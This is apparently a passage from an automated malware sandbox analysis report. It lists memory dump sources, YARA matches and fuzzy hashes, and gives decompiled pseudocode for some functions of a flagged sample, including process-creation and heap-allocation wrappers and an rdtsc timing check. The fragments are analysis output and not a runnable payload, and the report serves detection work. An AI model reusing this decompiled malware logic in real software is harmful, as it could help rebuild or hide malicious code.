                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                              • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                              • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                              • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A3FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                              • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                              • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                              • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A3FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                              • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                              • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                              • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A3FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                              • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                              • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                              • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A3FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                              • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                              • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                              • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A3FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                              • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                              • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                              • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A3FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                              • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                              • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                              • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A3FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                              • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                              • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                              • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A3FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                              • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                              • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                              • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A3FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                              • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                              • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                              • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00409AB0, Relevance: .1, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 93%
                                                              			E00409AB0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407EA0(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E004080B0( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041BE10( &_v284, 0x104);
						E0041C480( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DF0(E00414D90(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe045
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080E0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408160(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                                              0x00409abb
                                                              0x00409ac3
                                                              0x00409ac5
                                                              0x00409aca
                                                              0x00409acf
                                                              0x00409ae2
                                                              0x00409ae7
                                                              0x00409af0
                                                              0x00409afc
                                                              0x00409b0f
                                                              0x00409b14
                                                              0x00409b17
                                                              0x00409b20
                                                              0x00409b32
                                                              0x00409b37
                                                              0x00409b3c
                                                              0x00000000
                                                              0x00000000
                                                              0x00409b3e
                                                              0x00409b42
                                                              0x00000000
                                                              0x00000000
                                                              0x00409b44
                                                              0x00000000
                                                              0x00409b42
                                                              0x00409b46
                                                              0x00409b49
                                                              0x00409b4f
                                                              0x00409b51
                                                              0x00409b5c
                                                              0x00409b61
                                                              0x00409b64
                                                              0x00409b71
                                                              0x00409b7c
                                                              0x00409b7e
                                                              0x00409b84
                                                              0x00409b88
                                                              0x00409b8b
                                                              0x00409b8b
                                                              0x00409b92
                                                              0x00409b95
                                                              0x00409b9a
                                                              0x00409ba7
                                                              0x00409ad6
                                                              0x00409ad6
                                                              0x00409ad6

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                              • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                                              • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                              • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041A5F6, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID: 6EA
                                                              • API String ID: 1279760036-1400015478
                                                              • Opcode ID: a98847f2e252cc0ecf61119c51841db37d5db63ff107d9f4b25a8af0771ef148
                                                              • Instruction ID: 39720b43df85a4fb1fcfa181b4cfd610112105b72d9cfa92d60ccc77b1d29bf3
                                                              • Opcode Fuzzy Hash: a98847f2e252cc0ecf61119c51841db37d5db63ff107d9f4b25a8af0771ef148
                                                              • Instruction Fuzzy Hash: 4C11B1B1200204AFDB14DF98CC85EEB7BACEF88764F188549F95C9B242C531E961CBE0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041A775, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessInternalW.KERNEL32(00408CBD,00408CE5,00408A7D,00000010,00408CE5,00000044,?,?,?,00000044,00408CE5,00000010,00408A7D,00408CE5,00408CBD,00408D29), ref: 0041A734
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID: .AP
                                                              • API String ID: 2186235152-3996626295
                                                              • Opcode ID: 369bcf5cff0ac333a00cc4f5a8ef26e678caa2baed4bc36fa9bb978c6585be04
                                                              • Instruction ID: 9fb8beb3737be0cd1dd5625bdaa980dbd17ab0470ed6e0b1d8f9e03bcc281ba8
                                                              • Opcode Fuzzy Hash: 369bcf5cff0ac333a00cc4f5a8ef26e678caa2baed4bc36fa9bb978c6585be04
                                                              • Instruction Fuzzy Hash: DB11CEB52052486FDB04DF98DC81DE777ACEF88314F14829AF94C8B242C534E815CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041A630, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E0041A630(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				_t7 = _a4;
				E0041AF60(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_t7 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x414536
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                                                              0x0041a633
                                                              0x0041a647
                                                              0x0041a652
                                                              0x0041a65d
                                                              0x0041a661

                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID: 6EA
                                                              • API String ID: 1279760036-1400015478
                                                              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                              • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                                              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                              • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00408308, Relevance: 1.6, APIs: 1, Instructions: 61threadwindowCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 53%
                                                              			E00408308(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				long __edi;
				signed int __esi;
				void* __ebp;

				if(__eflags != 0) {
					asm("adc eax, 0x559909f8");
					_push(__ebp);
					__ebp = __esp;
					__esp = __esp - 0x40;
					_push(__esi);
					__eax =  &_v67;
					_v68 = 0;
					__eax = E0041BE60( &_v67, 0, 0x3f);
					__ecx =  &_v68;
					__eax = E0041CA00( &_v68, 3);
					_a4 = _a4 + 0x1c;
					__eax = E0040ACF0(__eflags, _a4 + 0x1c,  &_v68); // executed
					__eax = E00414E50(_a4 + 0x1c, __eax, 0, 0, 0xc4e7b6d6);
					__esi = __eax;
					__eflags = __esi;
					if(__esi != 0) {
						_push(__edi);
						__edi = _a8;
						__eax = PostThreadMessageW(__edi, 0x111, 0, 0); // executed
						__eflags = __eax;
						if(__eflags == 0) {
							__eax = E0040A480(__ecx, __eflags, 1, 8);
							__eax = __al & 0x000000ff;
							__ecx = __ebp + __eax - 0x40;
							__eax =  *__esi(__edi, 0x8003, __ebp + __eax - 0x40, __eax);
						}
						_pop(__edi);
					}
					_pop(__esi);
					__esp = __ebp;
					_pop(__ebp);
					return __eax;
				}
			}








                                                              0x0040830a
                                                              0x0040830c
                                                              0x00408310
                                                              0x00408311
                                                              0x00408313
                                                              0x00408316
                                                              0x00408319
                                                              0x0040831f
                                                              0x00408323
                                                              0x00408328
                                                              0x0040832e
                                                              0x0040833a
                                                              0x0040833e
                                                              0x0040834e
                                                              0x00408353
                                                              0x00408358
                                                              0x0040835a
                                                              0x0040835c
                                                              0x0040835d
                                                              0x0040836a
                                                              0x0040836c
                                                              0x0040836e
                                                              0x00408375
                                                              0x0040837a
                                                              0x00408380
                                                              0x0040838b
                                                              0x0040838b
                                                              0x0040838d
                                                              0x0040838d
                                                              0x0040838e
                                                              0x0040838f
                                                              0x00408391
                                                              0x00408392
                                                              0x00408392

                                                              APIs
                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              • Opcode ID: 5395406210b269f598131eee024416dc26fb76be6e5f910b34b47c189d571564
                                                              • Instruction ID: 83474eddad65d3c774883c75f756b4244a4566f4715317985112aa5046017eea
                                                              • Opcode Fuzzy Hash: 5395406210b269f598131eee024416dc26fb76be6e5f910b34b47c189d571564
                                                              • Instruction Fuzzy Hash: 2101D631A8032877E721A6959D42FFF77686F40B94F04015DFF04BB2C2E6B8690647EA
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00408310, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 82%
                                                              			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041BE60( &_v67, 0, 0x3f);
				E0041CA00( &_v68, 3);
				_t12 = E0040ACF0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A480( &_v68, _t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                              0x00408310
                                                              0x0040831f
                                                              0x00408323
                                                              0x0040832e
                                                              0x0040833e
                                                              0x0040834e
                                                              0x00408353
                                                              0x0040835a
                                                              0x0040835d
                                                              0x0040836a
                                                              0x0040836c
                                                              0x0040836e
                                                              0x0040838b
                                                              0x0040838b
                                                              0x00000000
                                                              0x0040838d
                                                              0x00408392

                                                              APIs
                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                              • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                                              • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                              • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041A6E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessInternalW.KERNEL32(00408CBD,00408CE5,00408A7D,00000010,00408CE5,00000044,?,?,?,00000044,00408CE5,00000010,00408A7D,00408CE5,00408CBD,00408D29), ref: 0041A734
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID:
                                                              • API String ID: 2186235152-0
                                                              • Opcode ID: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                                                              • Instruction ID: c0409bc591760e5b86b1b32807d612366400da8e17bcb8cc8f9e0bcd0fd11a44
                                                              • Opcode Fuzzy Hash: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                                                              • Instruction Fuzzy Hash: C601B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041A6E2, Relevance: 1.5, APIs: 1, Instructions: 41processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessInternalW.KERNEL32(00408CBD,00408CE5,00408A7D,00000010,00408CE5,00000044,?,?,?,00000044,00408CE5,00000010,00408A7D,00408CE5,00408CBD,00408D29), ref: 0041A734
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID:
                                                              • API String ID: 2186235152-0
